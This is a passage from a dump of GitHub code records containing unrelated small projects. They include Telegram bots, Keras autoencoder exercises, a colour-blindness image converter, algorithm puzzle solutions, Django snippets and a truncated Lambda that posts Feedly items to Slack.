nums[index]<=nums[index+2])","repo_name":"Chencx901/leetcode","sub_path":"problems/Non-decreasing-Array.py","file_name":"Non-decreasing-Array.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42673975708","text":"from aiogram import types\nfrom aiogram.utils import executor\nfrom aiogram.types import ParseMode, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom config import bot, dp\nimport logging\n\n\n@dp.message_handler(commands=['start'])\nasync def command_start(message: types.Message):\n await bot.send_message(message.from_user.id,\n f\"Hello {message.from_user.full_name}\")\n\n\n@dp.message_handler(commands=['quiz'])\nasync def quiz_1(message: types.Message):\n markup = InlineKeyboardMarkup()\n button_call_1 = InlineKeyboardButton(\n \"NEXT\",\n callback_data='button_call_1',\n )\n markup.add(button_call_1)\n\n question = 'Who is Martin Luther King?'\n answers = [\n 'The president', 'shooter', 'Preacher', 'Scientist'\n ]\n await bot.send_poll(\n chat_id=message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=2,\n explanation=\"Сам думай\",\n explanation_parse_mode=ParseMode.MARKDOWN_V2,\n reply_markup=markup\n )\n\n\n@dp.callback_query_handler(lambda call: call.data == \"button_call_1\")\nasync def quiz_2(call: types.CallbackQuery):\n markup = InlineKeyboardMarkup()\n button_call_2 = InlineKeyboardButton(\n \"NEXT\",\n callback_data='button_call_2',\n )\n markup.add(button_call_2)\n\n question = 'What the SpaceX?'\n answers = [\n \"First Variant\",\n \"Putin\",\n \"Store\",\n \"Griffin\",\n \"SpaceXsenomorphics\",\n \"Space Exploration Technologies Corporation\",\n ]\n await bot.send_poll(\n chat_id=call.message.chat.id,\n question=question,\n options=answers,\n is_anonymous=False,\n type='quiz',\n correct_option_id=5,\n explanation=\"Сам думай\",\n )\n\n\n@dp.message_handler(commands=['mem'])\nasync def mem_1(message: types.Message):\n photo = open(\"Media/mem.jpg\", 'rb')\n await bot.send_photo(chat_id=message.chat.id, photo=photo)\n\n\n@dp.message_handler()\nasync def echo(message: types.Message):\n await bot.send_message(message.from_user.id, 
message.text)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n executor.start_polling(dp, skip_updates=True)\n\n# if __name__ == \"__main__\":\n# executor.start_polling(dp, skip_updates=True)\n","repo_name":"Manty-S-Djusaem/HWWWW","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35606969070","text":"##########################\n### Proposed solutions ###\n##########################\n\n##################\n### Exercise 1 ###\n##################\n\nmrna_input = keras.layers.Input(shape=(input_size,), name=\"input\")\nhidden = keras.layers.Dense(embedding_size, activation=\"sigmoid\", kernel_regularizer=keras.regularizers.l1(.001), name=\"hidden\")(mrna_input)\noutput = keras.layers.Dense(input_size, activation=\"sigmoid\", kernel_regularizer=keras.regularizers.l1(.001), name=\"reconstruction\")(hidden)\nl1_ae = tf.keras.Model(mrna_input, output, name=\"L1-regularized autoencoder\")\n\nl1_ae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\nl1_ae.summary()\n\nl1_ae.fit(\n x=x_train,\n y=x_train,\n validation_data=[x_test, x_test],\n epochs=1000,\n callbacks=[keras.callbacks.EarlyStopping(\n monitor=\"val_loss\",\n patience=3\n )]\n)\n\npd.DataFrame(l1_ae.history.history).plot()\nplt.ylim(0,2)\n\nsns.distplot(l1_ae.layers[1].get_weights()[0].flatten(), kde=True)\nplt.xlabel(r\"$\\|w\\|$\")\n\n# this shows the distribution of weights to have a marked spike at 0, creating a sparser autoencoder.\n\n\n##################\n### Exercise 2 ###\n##################\nmrna_input = tf.keras.layers.Input(shape=(input_size,), name=\"input\")\nimage_noisy = tf.keras.layers.GaussianNoise(stddev=noise_factor, name=\"noisy\")(mrna_input)\nhidden = tf.keras.layers.Dense(intermediate_size, activation=\"sigmoid\", name=\"hidden\")(image_noisy)\noutput = tf.keras.layers.Dense(input_size, activation=\"sigmoid\", name=\"reconstruction\")(hidden)\ndae = tf.keras.Model(mrna_input, output)\n\ndae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\n\n\n##################\n### Exercise 3 ###\n##################\n\n# Define the sampling function for the reparametrization trick\ndef sample(arg):\n z_mean, z_log_var = arg\n eps = tf.random.normal(shape=(z_mean.shape[1],))\n return z_mean + tf.multiply(tf.exp(z_log_var * 0.5), eps)\n\n# Define the layers\nmrna_input = tf.keras.layers.Input(shape=(input_size,), name=\"input\")\nh = tf.keras.layers.Dense(intermediate_size, activation=\"relu\", name=\"hidden\")(mrna_input)\n\n# For the latent space, we learn the mean, and logvar\nz_mean = tf.keras.layers.Dense(intermediate_size, activation=\"sigmoid\", name=\"z_mean\")(h)\nz_log_var = tf.keras.layers.Dense(intermediate_size, name=\"z_log_var\")(h)\n\n# The latent factors are then obtained by sampling\nz = tf.keras.layers.Lambda(sample, output_shape=(intermediate_size,), name=\"sample\")([z_mean, z_log_var])\n\n# The output layer is the same\noutput = tf.keras.layers.Dense(input_size, activation=\"sigmoid\", name=\"reconstruction\")(z)\nvae = tf.keras.Model(mrna_input, output)\n\n\n# We'll need to define the KL loss and add it to the vae\nkl_loss = -0.5 * tf.reduce_sum(\n 1 + z_log_var - tf.square(z_mean) - tf.exp(z_log_var),\n axis=-1,\n)\nvae_loss = tf.reduce_mean(kl_loss)\n\n# This adds the loss to the VAE\nvae.add_loss(vae_loss)\n\n# And we add the MSE loss when 
compiling\nvae.compile(optimizer=tf.optimizers.Adam(), loss=tf.losses.mean_squared_error)\n\n###################\n### Exercise 3A ###\n###################\n\ndeterministic_encoder = tf.keras.Model(mrna_input, z_mean)\n\n","repo_name":"RaikOtto/CompCancer","sub_path":"Session_4_autoencoders/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21583181416","text":"from onnxruntime import GraphOptimizationLevel, InferenceSession, SessionOptions\nfrom transformers.utils import logging\nimport os\n\nlogger = logging.get_logger(__name__)\n\n\ndef _create_quantized_graph(quantizer, model, graph_path, feature):\n logger.info(f\"Creating quantized graph from {graph_path.as_posix()}\")\n quantizer.fit(model.config.name_or_path, output_dir=str(graph_path.parent.as_posix()),\n feature=feature)\n\n\ndef _warmup_onnx_graph(self, n=10):\n for _ in range(n):\n self.__call__(*self.example.values())\n\n\ndef _forward_onnx(onnx_model, inputs, return_tensors=False):\n inputs_onnx = {k: v.cpu().detach().numpy() for k, v in inputs.items()}\n predictions = onnx_model.run(None, inputs_onnx)\n return predictions\n\n\ndef _export_onnx_graph(quantizer, model, graph_path, feature):\n # if graph exists, but we are here then it means something went wrong in previous load\n # so delete old graph\n if graph_path.exists():\n graph_path.unlink()\n\n # create parent dir\n if not graph_path.parent.exists():\n os.makedirs(graph_path.parent.as_posix())\n\n logger.info(f\"Saving onnx graph at {graph_path.as_posix()}\")\n\n quantizer.export(model.config.name_or_path, output_path=graph_path,\n feature=feature)\n\n\ndef create_model_for_providers(model_path: str) -> InferenceSession:\n logger.info(f\"Creating model for providers: {model_path}\")\n # Few properties that might have an impact on performances (provided by MS)\n options = SessionOptions()\n options.intra_op_num_threads = 1\n options.graph_optimization_level = GraphOptimizationLevel.ORT_ENABLE_ALL\n\n # Load the model as a graph and prepare the CPU backend\n session = InferenceSession(str(model_path), options)\n session.disable_fallback()\n\n return session\n","repo_name":"AlekseyKorshuk/optimum-transformers","sub_path":"optimum_transformers/pipelines/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"31715198118","text":"import sys\nprint(sys.path)\n\nfrom PIL import Image, ImageDraw\n\ndef main():\n #ask the user for an image file they would like to change the colors of\n image_file = (\"\")\n image_file = input(\"what is the chart, or image you would like to upload?\")\n\n #print a list of different types of color blindness to cutomize to\n print()\n print(\"What is your type of color blindness:\")\n print(\"1. deuteranomaly \")\n print(\"2. protanopia \")\n print(\"3. tritanopia \")\n print(\"4. 
complete color blindness \")\n \n #ask the user for the type of colorblindness\n value_scale = input(\"Which type of color value scale would you like to convert to?\")\n\n #assign a variable to function to open, display, get the pixels, find the width and height, and create a new image for the image the user input\n user_image = open_image(image_file)\n show_image(user_image)\n user_pixels = get_pixels(user_image)\n (width, height) = user_image.size\n new_color_image = new_image(user_image)\n \n # use an if/elif chain to launch the correct function depending on the user input\n if value_scale == \"1\":\n deuteranomaly_colors(user_image, user_pixels, new_color_image, width, height)\n elif value_scale == \"2\":\n protanopia_colors(user_image, user_pixels, new_color_image, width, height)\n elif value_scale == \"3\":\n tritanopia_colors(user_image, user_pixels, new_color_image, width, height)\n elif value_scale == \"4\":\n complete_color_blindness(user_image)\n else: \n print(\"I'm sorry, that is not a valid option\")\n\n#create a function that will open and read and return the file given by the user\ndef open_image(image_file):\n color_image = Image.open(image_file)\n return color_image\n\n#display the original unedited image file to the user\ndef show_image(user_image):\n user_image.show()\n\n#create a new image for the new color values to be added to \ndef new_image(user_image):\n output_image = Image.new(\"RGB\", user_image.size)\n return output_image\n\n#get the pixels from the image file given by the user\ndef get_pixels(user_image):\n\n pixels_image = user_image.load()\n return pixels_image\n\ndef deuteranomaly_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\" Unable to perceive green light. Deuteranomaly is the most common type of color blindness. \n it is also known as red/green color blindness. It makes red look brownish/yellowish. \n It makes yellow and green look beige. and it makes it difficult to tell blue and violet apart. \n this function will determine any pixels within the file that have colors that are hard\n for people with Deuteranomaly to tell apart and change them to a color they \n can easily tell apart. Don't use red/green/brown/orange together. \"\"\"\n \n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (255, 0, 0)\n \n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * 1.50)\n g = int(g * .25)\n b = int(b * .25)\n draw.point((x, y), (r, g, b))\n \n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef protanopia_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\" it is also known as red/green color blindness. Protanopia happens\n when there are no working red cones, making it impossible\n to see the color red. orange, yellow and green look yellow. 
this function will \n determine any pixels within the file that have colors that are hard\n for people with protanopia to tell apart and change them to a color they \n can easily tell apart.\"\"\"\n\n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (255, 0, 0)\n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * .50)\n g = int(g * .50)\n b = int(b * 1.25)\n draw.point((x, y), (r, g, b))\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef tritanopia_colors(user_image, user_pixels, new_color_image, width, height):\n \"\"\"this is also known as blue/yellow color blindness. it is the 2nd most common\n type of colorblindness. there are no blue cone cells. blue looks green\n yellow looks light gray or violet \"\"\"\n\n def distance2(color1, color2):\n r1, g1, b1 = color1\n r2, g2, b2 = color2\n return (r1 - r2) ** 2 + (g1 - g2) ** 2 + (b1 - b2) ** 2\n\n color_to_change = (0, 255, 0)\n threshold = 230\n\n # Create output image\n draw = ImageDraw.Draw(new_color_image)\n\n # Generate image\n for x in range(width):\n for y in range(height):\n r, g, b = user_pixels[x, y]\n if distance2(color_to_change, user_pixels[x, y]) < threshold ** 2:\n r = int(r * 1.00)\n g = int(g * .25)\n b = int(b * 1.50)\n\n \n draw.point((x, y), (r, g, b))\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\ndef complete_color_blindness(user_image):\n \"\"\"this is the most rare color blindness someone can have. you have no \n color perseption at all. making the world gray, white, and black. it is \n very hard to tell color apart from each other. 
this function will take each color\n and put it into a gray scale version of that color making it easier for people\n with complete colorblindness to tell values apart\"\"\"\n\n new_color_image = user_image.convert(\"L\")\n\n #display and save the new image\n new_color_image.show()\n new_color_image.save(\"new_image.png\")\n\n#Color combinations to avoid for people with color blindness include:\n#Red & green\n#Green & brown\n#Green & blue\n#Blue & gray\n#Blue & purple\n#Green & gray\n#Green & black\nif __name__ == \"__main__\": \n main()","repo_name":"elisabeth-billman/ChromaClarity","sub_path":"color_converter.py","file_name":"color_converter.py","file_ext":"py","file_size_in_byte":6536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27473043910","text":"from aiogram import types\nfrom aiogram.dispatcher.filters import Command\n\nfrom data.config import CHAT_ID\nfrom filters import Is_Admin\nfrom loader import dp, bot\nfrom utils.db_utils.db_functions import get_user_id, get_user_xp, terminate_user\nfrom utils.inline_keyboards import admin_panel, get_all_users_keyboard, get_user_keyboard, back_to_user_menu, \\\n back_to_users_keyboard\n\n\n@dp.message_handler(Command(\"admin_panel\"), Is_Admin(), chat_type=[types.ChatType.PRIVATE])\nasync def get_admin_panel(message: types.Message):\n await message.answer(\"Вы вошли в админ-панель.\", reply_markup=admin_panel)\n\n\n@dp.callback_query_handler(text=\"get_users\", chat_type=[types.ChatType.PRIVATE])\nasync def get_all_users_from_admin_panel(callback: types.CallbackQuery):\n await callback.message.edit_text(\"Все пользователи группы:\")\n await callback.message.edit_reply_markup(reply_markup=await get_all_users_keyboard())\n\n\n@dp.callback_query_handler(text_contains=\"get_user\", chat_type=[types.ChatType.PRIVATE])\nasync def get_user_from_admin_panel(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n\n await callback.message.edit_text(f\"Пользователь {user_name}:\")\n await callback.message.edit_reply_markup(reply_markup=await get_user_keyboard(user_name))\n\n\n@dp.callback_query_handler(text_contains=\"get_xp\", chat_type=[types.ChatType.PRIVATE])\nasync def get_xp_from_user(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n user_id = await get_user_id(user_name)\n user_xp = await get_user_xp(user_id)\n\n await callback.message.edit_text(f\"Опыт пользователя {user_name}: {user_xp}xp.\")\n await callback.message.edit_reply_markup(reply_markup=await back_to_user_menu(user_name))\n\n\n@dp.callback_query_handler(text_contains=\"terminate_user\", chat_type=[types.ChatType.PRIVATE])\nasync def terminate_user_from_group(callback: types.CallbackQuery):\n user_data = callback.data.split(\":\")\n user_name = user_data[1].strip()\n user_id = await get_user_id(user_name)\n\n await callback.message.edit_text(f\"Пользователь {user_name} был удалён из базы данных и заблокирован \"\n f\"в группе.\")\n await callback.message.edit_reply_markup(reply_markup=back_to_users_keyboard)\n\n await terminate_user(user_id)\n await bot.ban_chat_member(CHAT_ID, user_id)\n\n\n@dp.callback_query_handler(text_contains=\"back_to_admin_panel\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_admin_panel(callback: types.CallbackQuery):\n await callback.message.edit_text(\"Админ панель.\")\n await 
callback.message.edit_reply_markup(admin_panel)\n\n\n@dp.callback_query_handler(text_contains=\"admin_panel_exit\", chat_type=[types.ChatType.PRIVATE])\nasync def exit_from_admin_panel(callback: types.CallbackQuery):\n await callback.message.delete()\n\n\n@dp.callback_query_handler(text=\"back_to_all_users\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_all_users_panel(callback: types.CallbackQuery):\n await get_all_users_from_admin_panel(callback)\n\n\n@dp.callback_query_handler(text=\"back_to_user\", chat_type=[types.ChatType.PRIVATE])\nasync def back_to_user_panel(callback: types.CallbackQuery):\n await get_user_from_admin_panel(callback)","repo_name":"Hallteon/moderator-telegram-bot","sub_path":"handlers/admins/admin_panel_handlers.py","file_name":"admin_panel_handlers.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2071581143","text":"#converting num to string is trivial, requires extra space\n#find left most and right most number (not character) and compare them\n#but how to do it math way? see the smart method below\n\nclass Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0 or x%10==0 and x>0:\n return False\n \n r = 1\n while x / r >= 10:\n r *= 10\n # r is the highest digit of x (10 base)\n # for example, x=121 -> r = 100\n\n while r > 1:\n \n #shorten x by triming 1 digit from left\n left, x =divmod(x, r)\n #shorten x by triming 1 digit from right\n x, right = divmod(x, 10)\n \n #compare left & right\n if left != right:\n return False\n #because x has been shorted by 2 digits in each loop\n #so in next loop r = r/100\n r //= 100\n\n return True\n","repo_name":"mcfair/Algo","sub_path":"Math/009. Palindrome Number.py","file_name":"009. 
Palindrome Number.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28319584221","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\nn, m = map(int, input().split())\r\nboard = [list(input().strip()) for _ in range(n)]\r\n\r\n# declare a 4-D visited array over both balls' coordinates (x, y), initialized to False; if a state is unvisited, push it to the queue and mark it True\r\nvisited = [[[[False]*m for _ in range(n)] for _ in range(m)] for _ in range(n)]\r\ndx = (-1, 1, 0, 0) # x offsets for (left, right, up, down)\r\ndy = (0, 0, -1, 1) # y offsets for (left, right, up, down)\r\nq = deque()\r\n\r\n\r\ndef init():\r\n rx, ry, bx, by = [0] *4 # initialize the red and blue balls' positions\r\n for i in range(n):\r\n for j in range(m):\r\n if board[i][j] == 'R':\r\n rx, ry = i,j\r\n if board[i][j] == 'B':\r\n bx, by = i,j\r\n\r\n print('red ball position :', (rx, ry), 'blue ball position :', (bx, by))\r\n q.append((rx, ry, bx, by, 1)) # 1 is the depth\r\n visited[rx][ry][bx][by] = True\r\n\r\n\r\ndef move(x, y, dx, dy):\r\n cnt = 0 # number of cells moved\r\n while board[x+dx][y+dy] !='#' and board[x][y] !='0':\r\n x += dx\r\n y += dy\r\n cnt +=1\r\n\r\n return x,y, cnt\r\n\r\n\r\ndef bfs():\r\n init()\r\n while q:\r\n rx, ry, bx, by, depth =q.popleft()\r\n if depth > 10: # stop once the balls have moved more than 10 times\r\n break\r\n for i in range(len(dx)):\r\n Nrx, Nry, rcnt = move(rx, ry, dx[i], dy[i]) # red ball movement\r\n Nbx, Nby, bcnt = move(bx, by, dx[i], dy[i]) # blue ball movement\r\n\r\n print('depth :', depth, \"direction :\", dx[i],dy[i], 'red ball position:', Nrx, Nry, \"blue ball :\", Nbx, Nby )\r\n\r\n if board[Nrx][Nry] == '0': # if the red ball falls into the hole\r\n print('depth =', depth)\r\n return\r\n if board[Nbx][Nby] == '0': # if the blue ball falls into the hole\r\n continue\r\n if Nrx == Nbx and Nry == Nby: # if the red and blue balls end up on the same cell\r\n if rcnt > bcnt: # the ball that moved farther steps back one cell\r\n Nrx -= dx[i]\r\n Nry -= dy[i]\r\n else:\r\n Nbx -= dx[i]\r\n Nby -= dy[i]\r\n\r\n # check whether this state was visited\r\n if not visited[Nrx][Nry][Nbx][Nby]:\r\n visited[Nrx][Nry][Nbx][Nby] = True\r\n q.append((Nrx, Nry, Nbx, Nby, depth+1))\r\n\r\n print(-1) # failure\r\n\r\nbfs()","repo_name":"daehanchoi-dev/BOJ-BAEKJOONALGORITHM","sub_path":"13460.py","file_name":"13460.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41299993712","text":"def canFinish(numCourses, prerequisites):\n from collections import defaultdict\n \n if len(prerequisites)==0:\n return True\n \n graph = defaultdict(set)\n \n def cycleUtil(vertex,visited,stack):\n visited.add(vertex)\n stack.add(vertex)\n for adj in graph[vertex]:\n if adj not in visited:\n if cycleUtil(adj,visited,stack):\n return True\n elif adj in stack:\n return True\n stack.remove(vertex)\n return False\n \n \n def cycle():\n visited = set()\n stack = set()\n for vertex in range(numCourses):\n if vertex not in visited:\n if cycleUtil(vertex,visited,stack):\n return True\n return False\n \n \n for i in range(numCourses):\n graph[i]\n \n for course, req in prerequisites:\n graph[course].add(req)\n \n return not cycle()\n\nprint(canFinish(4,[[2,0],[1,0],[3,1],[3,2],[1,3]]))","repo_name":"amanptl/LeetCode","sub_path":"Medium/Course Schedule.py","file_name":"Course Schedule.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3813592867","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import *\n\n\ndef index(request):\n context = {'questions_list': 
Question.objects.all()}\n return render(request, 'polls/index.html', context)\n\n\ndef detail(request, question_id):\n question = None\n\n try:\n question = Question.objects.get(pk=question_id)\n except:\n print(\"Question with id \" + str(question_id) + \" was not found\")\n\n context = {'question': question}\n\n return render(request, 'polls/detail.html', context)","repo_name":"AlessandroFC15/PollsApp","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39199768039","text":"import argparse\nimport requests\nimport bs4\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", type=str, nargs='+')\n \n args = parser.parse_args()\n ips = args.ip\n \n return ips\n \nips = parse()\nidx = 1\nprint(\"\\n\")\nfor ip in ips:\n url = 'http://ip2nation.com/'\n res = requests.post(url, data={'ip' : ip})\n \n res = bs4.BeautifulSoup(res.text, 'html.parser')\n res = res.find('acronym').text\n \n print(\"[\"+str(idx)+\"] \"+ip+\" ==> \"+res)\n idx += 1\n\t\n\t#python ip.py --ip [ip]","repo_name":"nostaljic/ip2nation","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8585687839","text":"from django.urls import path\nfrom .views import RoleViewSet,TitleViewSet,EventViewSet,ReviewCommentViewSet,AuthorView,FetchAllBlog,FetchRoleWiseAccount,FetchSortedEvent,PageReadLog\nfrom rest_framework_nested import routers\nrouter = routers.DefaultRouter()\n\nrouter.register('titles',viewset=TitleViewSet,basename='titles')\ntitle_router = routers.NestedDefaultRouter(router,'titles',lookup='title')\ntitle_router.register('events',viewset=EventViewSet,basename='title-events')\nrouter.register('events',viewset=EventViewSet,basename='events')\nevent_router = routers.NestedDefaultRouter(router,'events',lookup='event')\nevent_router.register('comments',viewset=ReviewCommentViewSet,basename='event-comments')\nrouter.register('roles',viewset=RoleViewSet,basename='roles')\n\nurlpatterns = [\n path('author-interface/', AuthorView.as_view(),name='admin'),\n path('fetch-blogs/',FetchAllBlog.as_view(),name='allblog'),\n path('fetch-role-wise-account/',FetchRoleWiseAccount.as_view(),name=\"fetchrolewiseaccount\"),\n path('fetch-sorted-event/',FetchSortedEvent.as_view(),name=\"fetchsortedevent\"),\n path('page-read-logs/',PageReadLog.as_view(),name=\"pagereadlogs\")\n \n] + router.urls + title_router.urls + event_router.urls\n\n\n\n","repo_name":"RushikeshPtl/anveshak-inhouse","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2579030709","text":"num1= input(\"Enter first Number : \")\r\nnum2= input(\"Enter second Number : \")\r\nnum3= input(\"Enter third Number : \")\r\nnum4= input(\"Enter fourth Number : \")\r\n\r\nnum1= (int)(num1)\r\nnum2= (int)(num2)\r\nnum3= (int)(num3)\r\nnum4= (int)(num4)\r\n\r\ngreatest=0\r\n\r\nif(num1>num2 and num1>num3 and num1>num4):\r\n greatest=num1\r\nelif(num2>num1 and num2>num3 and num2>num4):\r\n greatest=num2\r\nelif(num3>num1 and num3>num2 and num3>num4):\r\n greatest=num3\r\nelif(num4>num1 and num4>num2 and num4>num3):\r\n greatest=num4\r\n\r\n\r\nprint(\"The greatest number is : 
\",str(greatest))","repo_name":"Unseen-Elder/Python_practice","sub_path":"f6/p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8251191649","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\nsd.resolution = 1800, 900\n\n\n# Шаг 1: Реализовать падение снежинки через класс. Внести в методы:\n# - создание снежинки с нужными параметрами\n# - отработку изменений координат\n# - отрисовку\n\n\nclass Snowflake:\n\n def __init__(self, name=None):\n self.name = name\n self.x = sd.random_number(100, 1100)\n self.y = sd.random_number(700, 800)\n self.length = sd.random_number(5, 30)\n\n def __str__(self):\n return self\n\n def move(self):\n self.x += sd.random_number(-5, 5)\n self.y -= sd.random_number(5, 20)\n\n def clear_previous_picture(self):\n point = sd.get_point(self.x, self.y)\n sd.snowflake(center=point, length=self.length, color=sd.background_color)\n\n def draw(self):\n point = sd.get_point(self.x, self.y)\n sd.snowflake(center=point, length=self.length)\n\n def can_fall(self):\n return self.y > 10\n\n\nsnowflake_list = []\n\n\ndef get_flakes(count):\n global snowflake_list\n for name in range(count):\n snowflake_list.append(Snowflake())\n return snowflake_list\n\n\ndef get_fallen_flakes():\n for_remove = []\n count = 0\n for i in snowflake_list:\n if i.can_fall() is False:\n count += 1\n for_remove.append(i)\n return count, for_remove\n\n\ndef remove(for_remove_list):\n global snowflake_list\n for i in for_remove_list:\n snowflake_list.remove(i)\n return snowflake_list\n\n\n# flake = Snowflake()\n# while True:\n# flake.clear_previous_picture()\n# flake.move()\n# flake.draw()\n#\n# if not flake.can_fall():\n# break\n# sd.sleep(0.1)\n# if sd.user_want_exit():\n# break\n\n# # шаг 2: создать снегопад - список объектов Снежинка в отдельном списке, обработку примерно так:\n\nflakes = get_flakes(10) # создать список снежинок\n\nwhile True:\n for flake in flakes:\n flake.clear_previous_picture()\n flake.move()\n flake.draw()\n fallen_flakes = get_fallen_flakes() # подчитать сколько снежинок уже упало\n if fallen_flakes:\n get_flakes(count=fallen_flakes[0]) # добавить еще сверху\n remove(for_remove_list=fallen_flakes[1])\n sd.sleep(0.1)\n if sd.user_want_exit():\n break\n\nsd.pause()\n\n# зачёт!\n","repo_name":"AlexanderKornev/Public","sub_path":"lesson_007/01_snowfall.py","file_name":"01_snowfall.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24679395523","text":"import logging.config\nimport traceback\nimport os\nimport json\nimport base64\nimport boto3\nimport requests\n\ndef decryptionUrl(encrypted_environ):\n decrypted_environ = boto3.client('kms').decrypt(CiphertextBlob=base64.b64decode(encrypted_environ))['Plaintext']\n return 'https:{}'.format(\n decrypted_environ.decode('utf-8')\n )\n\n# get environ\nerror_slack_url = decryptionUrl(os.environ.get('ERROR_SLACK_URL', None))\nerror_slack_channel = os.environ.get('ERROR_SLACK_CHANNEL', None)\nlog_level = os.environ.get('LOG_LEVEL', 'ERROR')\n\n# debug settings\ndef logger_level(level):\n if level == 'CRITICAL':\n return 50\n elif level == 'ERROR':\n return 40\n elif level == 'WARNING':\n return 30\n elif level == 'INFO':\n return 20\n elif level == 'DEBUG':\n return 10\n else:\n return 0\n\nlogger = logging.getLogger()\nlogger.setLevel(logger_level(log_level))\n\ndef lambda_handler(event, context):\n 
try:\n        # get environ\n        slack_url = decryptionUrl(os.environ.get('SLACK_URL', None))\n        slack_channel = os.environ.get('SLACK_CHANNEL', None)\n\n        # data to slack\n        if not('Records' in event):\n            return event\n\n        records = event['Records']\n        for record in records:\n\n            if not('dynamodb' in record):\n                continue\n\n            if not('NewImage' in record['dynamodb']):\n                continue\n\n            feed = record['dynamodb']['NewImage']\n            art_title = feed['art_title']['S']\n            art_url = feed['art_url']['S']\n            author_name = feed['author_name']['S']\n            author_url = feed['author_url']['S']\n\n            # If a feed doesn't have any image, the Feedly official logo will be set.\n            # This script may catch an error if it fails to get an image file.\n            if 'art_image_url' in feed:\n                art_image_url = feed['art_image_url']['S']\n            else:\n                art_image_url = 'https://s5.feedly.com/images/feedly-512.png'\n\n            if 'written_by' in feed:\n                written_by = ' by ' + feed['written_by']['S']\n            else:\n                written_by = ' '\n\n            if 'summary' in feed:\n                summary = feed['summary']['S'][0:100] + '....'\n            else:\n                # Setting a half-width space so the script does not stop.\n                summary = ' '\n\n            # this is the right way to write with 'blocks' in the Slack API\n            requests.post(\n                slack_url,\n                json.dumps(\n                    {\n                        'blocks': [\n                            {\n                                'type': 'section',\n                                'text': {\n                                    'type': 'mrkdwn',\n                                    'text': '*<{art_url}|{art_title}>*\\n<{author_url}|{author_name}>{written_by}\\n{summary}'.format(\n                                        art_url = art_url,\n                                        art_title = art_title,\n                                        author_url = author_url,\n                                        author_name = author_name,\n                                        written_by = written_by,\n                                        summary = summary\n                                    )\n                                },\n                                'accessory': {\n                                    'type': 'image',\n                                    'image_url': art_image_url,\n                                    'alt_text': ' '\n                                }\n                            }\n                        ]\n                    }\n                )\n            )\n\n    except:\n        logger.error(traceback.format_exc())\n        requests.post(\n            error_slack_url,\n            json.dumps(\n                {\n                    'blocks': [\n                   